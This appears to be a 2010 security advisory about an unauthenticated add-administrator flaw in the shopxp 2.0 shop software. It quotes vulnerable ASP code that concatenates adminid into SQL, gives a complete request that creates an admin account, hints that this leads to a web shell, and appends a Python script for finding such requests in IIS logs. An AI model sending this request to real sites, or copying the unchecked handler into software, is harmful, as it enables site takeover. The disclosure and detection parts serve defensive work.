shopxp html version 2.0 direct add administrator vulnerability - vulnerability warning - the black bar safety net

2010-10-11T00:00:00
ID MYHACK58:62201028081
Type myhack58
Reporter 佚名
Modified 2010-10-11T00:00:00

Description

lan3a told me he had already posted this, so it turns out I'm not the first one... sweat.

Program: shopxp html version 2.0 (version 1.0 should be the same)

Vulnerability: direct add administrator

Keywords: could not find a search keyword, depressing

FROM http://www.st999.cn/blog BY wandering wind 2010/10/9

Program download address: http://www.codepub.com/software/SHOPXP-7615.html

<!--#include file="xp.asp"-->
<%
dim adminid,action
action=request.QueryString("action")
adminid=request.QueryString("id")
if adminid="" then adminid=request("adminid")
select case action
case "save"
    set rs=server.CreateObject("adodb.recordset")
    rs.Open "select * from [shopxp_admin] where adminid="&adminid,conn,1,3

....................................

    rs.Update
    rs.Close
    set rs=nothing
    response.Write "<script language=javascript>alert('Operation successful!');history.go(-1);</script>"
case "del"
    conn.execute "delete from [shopxp_admin] where adminid in ("&adminid&")"
    'response.Redirect "manageuser.asp"
    response.Redirect request.servervariables("http_referer")
end select
%>

The included xp.asp:

<!--#include file="database_name.asp"-->
<%
dim conn,connstr,db
startime=timer()
db="../shopxp/"&dataname&"" 'database
on error resume next 'attempt to connect to the database until it times out; SQL injection filtering could also be strengthened here
connstr = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Server.MapPath(db)
'connstr="DBQ="+server.mappath(""&db&"")+";DefaultDir=;DRIVER={Microsoft Access Driver (*.mdb)};"
set conn=server.createobject("ADODB.CONNECTION")
conn.open connstr
%>

So: the only file savexpadmin.asp includes is xp.asp, which just opens the database connection. Nothing checks whether the caller is a logged-in administrator before the action branches run, and the adminid value is concatenated straight into the SQL in the "del" branch. That missing login check is what produces the direct add-administrator vulnerability: anyone who can reach the script can call its add action.

http://127.0.0.1:99/admin/savexpadmin.asp?action=add&admin2=st999&password2=st999.cn&Submit2=%CC%ED%BC%D3%B9%DC%C0%ED%D4%B1

Here admin2 and password2 are the username and password of the administrator to be added; Submit2 is only the GBK-encoded label of the form button, 添加管理员 ("add administrator").

The added user does not get the highest administrator level, but it does have edit and image-upload permissions, which is enough to get a shell.
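For anyone checking whether this has already been used against a site, the hits are easy to spot in the IIS logs: because the handler needs no session, every request to savexpadmin.asp carrying an action parameter is an administrator change from an arbitrary source. The following is an added example, not code from the original post or from shopxp: it parses constructed IIS W3C log lines (the field layout in the #Fields line is an assumption), pulls out add/del/save calls to the script, and decodes the GBK-encoded Submit2 value so the log entry reads the same way the form does.

```python
"""Find add/del/save calls to savexpadmin.asp in IIS W3C logs.

Added example; not part of the original advisory or of shopxp. The log
lines below are constructed for illustration and the #Fields layout is an
assumption about how the server was configured.
"""
from urllib.parse import parse_qs

TARGET = "/admin/savexpadmin.asp"
ADMIN_ACTIONS = ("add", "del", "save")

# Constructed sample log (IIS W3C format); not a real capture.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2010-10-09 12:00:01 203.0.113.5 GET /shopxp/index.asp - 200
2010-10-09 12:00:07 203.0.113.5 GET /admin/savexpadmin.asp action=add&admin2=st999&password2=st999.cn&Submit2=%CC%ED%BC%D3%B9%DC%C0%ED%D4%B1 200
2010-10-09 12:00:09 203.0.113.5 GET /admin/savexpadmin.asp action=del&id=1 302
2010-10-09 12:01:00 198.51.100.7 POST /admin/savexpadmin.asp action=save&adminid=2 200
"""


def parse_w3c(text):
    """Yield one dict per log record, keyed by the names in the #Fields line."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or not line.strip() or fields is None:
            continue
        yield dict(zip(fields, line.split()))


def find_admin_changes(text):
    """Return every request that drives the action switch in savexpadmin.asp.

    Query values are percent-decoded as GBK, the encoding this shopxp build
    uses for its form labels, so Submit2 comes back as readable Chinese.
    """
    hits = []
    for rec in parse_w3c(text):
        if rec.get("cs-uri-stem", "").lower() != TARGET:
            continue
        query = parse_qs(rec.get("cs-uri-query", ""),
                         keep_blank_values=True, encoding="gbk")
        action = query.get("action", [""])[0].lower()
        if action not in ADMIN_ACTIONS:
            continue
        hit = {
            "time": f"{rec['date']} {rec['time']}",
            "ip": rec["c-ip"],
            "action": action,
            "status": rec["sc-status"],
        }
        if action == "add":
            # The username that was created; password2 is deliberately not recorded.
            hit["new_admin"] = query.get("admin2", [""])[0]
            hit["submit_label"] = query.get("Submit2", [""])[0]
        else:
            # "del" and "save" take the target row from id, falling back to adminid,
            # mirroring the QueryString("id") / request("adminid") lookup in the script.
            hit["adminid"] = query.get("id", query.get("adminid", [""]))[0]
        hits.append(hit)
    return hits


if __name__ == "__main__":
    for h in find_admin_changes(SAMPLE_LOG):
        print(h)
```

Any "add" hit whose new_admin value is not one of the site's known administrators is a created account that should be removed, and the image-upload directory is the next place to look.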

As for how to get the shell, I won't say; everybody knows.